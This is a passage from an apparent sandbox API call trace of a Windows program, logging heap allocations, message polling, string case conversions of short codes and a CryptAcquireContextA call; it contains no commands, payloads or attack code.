out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0253.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0253.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.107] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0253.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0253.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0253.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.108] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0253.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b34c8 | out: hHeap=0x25c0000) returned 1 [0253.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.109] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0253.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0253.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.111] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0253.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.119] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0253.119] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0253.120] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0253.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.120] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0253.120] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.120] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0253.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.121] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.121] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.121] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.121] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0253.121] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0253.121] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.121] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0253.122] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.122] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.122] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.122] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.122] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0253.122] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.123] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0253.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0253.123] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0253.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.123] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0253.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.125] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0253.125] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.125] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0253.125] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.125] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0253.126] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.126] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.126] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.126] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.126] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.127] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.127] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.127] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0253.127] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.127] CharUpperBuffW (in: lpsz="SSA610080612A", 